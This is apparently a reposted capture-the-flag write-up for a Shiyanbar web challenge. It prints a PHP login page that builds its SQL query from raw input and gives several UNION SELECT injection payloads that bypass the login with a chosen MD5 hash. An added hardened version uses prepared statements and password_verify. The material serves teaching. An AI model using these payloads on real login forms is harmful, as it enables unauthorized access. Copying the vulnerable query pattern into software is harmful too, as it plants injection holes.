Shiyanbar (实验吧) - web - Program Logic Problem

Copyright notice: a3uRa QQ:962620891 github:asuralinmo.github.io https://blog.csdn.net/qq_41173457/article/details/82183428

Source code: index.txt
The source code is found there:

<html>
<head>
welcome to simplexue
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
    $conn = mysql_connect("********", "*****", "********");
    mysql_select_db("phpformysql") or die("Could not select database");
    if ($conn->connect_error) {
        die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
    printf("Error: %s\n", mysql_error($conn));
    exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];

  if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
    echo "<p>Logged in! Key:************** </p>";
}
else {
    echo("<p>Log in failure!</p>");

  }


}

?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.txt">
</html>

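Code audit
The value of $_POST[user] is concatenated directly into the SQL query, and the login succeeds whenever md5($_POST[pass]) matches whatever pw the query returns. A UNION SELECT in user can therefore supply a row whose pw is the MD5 of a password we choose ourselves. This yields two payloads:
user=' union select md5(9)#&pass=9
user=' union select md5('x')#&pass=x
user=admin' and 0=1 union select md5(1)#&pass=1
user=admin' and 0=1 union select '202cb962ac59075b964b07152d234b70'#&pass=123
user=admin' and 0=1 union select '0dfb2d09aeef6a0220a25c2e2d0fddbd'#&pass=numa
A script for computing the MD5 value is attached: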

import hashlib
aa='numa'
bb=hashlib.md5()
bb.update(aa.encode('utf-8'))
print(bb.hexdigest())
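
A hardened form of the login check audited above, added here as an example (it is not the challenge's code or the author's). It keeps the table and column names from the page's query (php, user, pw); the in-memory SQLite database reached through PDO, the sample account, and the use of password_hash/password_verify in place of md5 are assumptions made for the demonstration.

```php
<?php
// Added example: table/column names follow the page's query; the SQLite
// in-memory database and the account below are constructed for the demo.
declare(strict_types=1);

function check_login(PDO $db, string $user, string $pass): bool
{
    // Bound parameter: $user travels as data, never as SQL text, so a
    // quote or UNION inside it cannot change the statement or add rows.
    $stmt = $db->prepare('SELECT pw FROM php WHERE user = :user');
    $stmt->execute([':user' => $user]);
    $rows = $stmt->fetchAll(PDO::FETCH_COLUMN);

    // Require exactly one stored credential for the named account.
    if (count($rows) !== 1) {
        return false;
    }

    // password_verify() only accepts hashes produced by password_hash(),
    // so a bare MD5 hex string can never compare equal here.
    return password_verify($pass, (string) $rows[0]);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE php (user TEXT PRIMARY KEY, pw TEXT NOT NULL)');

// Constructed sample account with a salted, slow password hash.
$insert = $db->prepare('INSERT INTO php (user, pw) VALUES (?, ?)');
$insert->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

$cases = [
    ['admin', 'constructed-sample-password'],
    ['admin', 'wrong-password'],
    // One of the page's inputs, passed through unchanged.
    ["admin' and 0=1 union select '202cb962ac59075b964b07152d234b70'#", '123'],
];

foreach ($cases as [$user, $pass]) {
    $result = check_login($db, $user, $pass) ? 'logged in' : 'rejected';
    printf("%-68s => %s\n", $user, $result);
}
```

Only the first case logs in: the injected string is looked up as a literal user name, matches no row, and is rejected before any hash comparison takes place.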

Reposted from blog.csdn.net/qq_41173457/article/details/82183428